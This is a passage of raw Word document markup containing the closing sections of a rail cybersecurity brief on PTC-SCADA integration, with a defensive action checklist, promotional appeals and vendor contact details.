          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero disruption to passenger service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-time safety validation</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A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL-4 maintained throughout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insurance premiums reduced 45%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Model for other transit systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$127M in risk mitigation</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8hh4wzqa6m07" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Taking Action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jll9xbbrrwez" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your 24-Hour Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_keqrmwdn20ek" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate (Next 24 Hours):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Convene emergency response team ☐ Isolate PTC-SCADA connections ☐ Contact tri-partner team ☐ Brief executive leadership ☐ Initiate funding approval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xb1dd3csl2z7" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Urgent (Next 72 Hours):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Complete integration inventory ☐ Deploy monitoring capability ☐ Establish federal coordination ☐ Begin threat hunting ☐ Document current state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qx3dchacoq0d" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical (Next 7 Days):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Approve implementation plan ☐ Allocate resources ☐ Start segmentation ☐ Train response team ☐ Test manual overrides</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9w7dukl18tcb" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Call to Action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4qz6ama6s0p0" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Clock Is Ticking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Every day your PTC-SCADA integration remains unsecured is another day adversaries can turn your safety systems into weapons. The architectural flaws are known. The exploits are proven. The attacks are beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4z9iwjqv36xw" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Your Defense Team Now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE</w:t>
      </w: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ptc-emergency@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone: 1-800-PTC-SAFE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nccgroup.com/ptc-defense</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lead: Dr. Sarah Mitchell, Rail Practice</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7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Industrial Security</w:t>
      </w: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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">rail@dragos.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone: 1-877-3DRAGOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Portal: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://portal.dragos.com/rail</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lead: Mark Bristow, Rail Sector</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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety Systems</w:t>
      </w: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ptc-safety@adelard.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone: +44-20-SAFE-PTC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://adelard.com/rail-safety</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lead: Prof. John Smith, Safety Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lbrtxyxhdb1" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Choice Is Clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure your PTC-SCADA integration with the only solution that maintains safety while defeating advanced threats. Or accept unlimited liability when safety systems become attack vectors.</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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protect your trains. Protect your passengers. Protect your future.</w:t>
      </w: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B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 016 - Enhanced Edition</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Nightingale: "Clean water, reliable energy, and access to healthy food for our grandchildren"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">© 2025 NCC Group OTCE + Dragos + Adelard. All rights reserved.</w:t>
      </w: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ptc-safety@adelard.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.dragos.com/rail" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adelard.com/rail-safety" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:rail@dragos.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ptc-emergency@nccgroup.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ptc-emergency@nccgroup.com" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nccgroup.com/ptc-defen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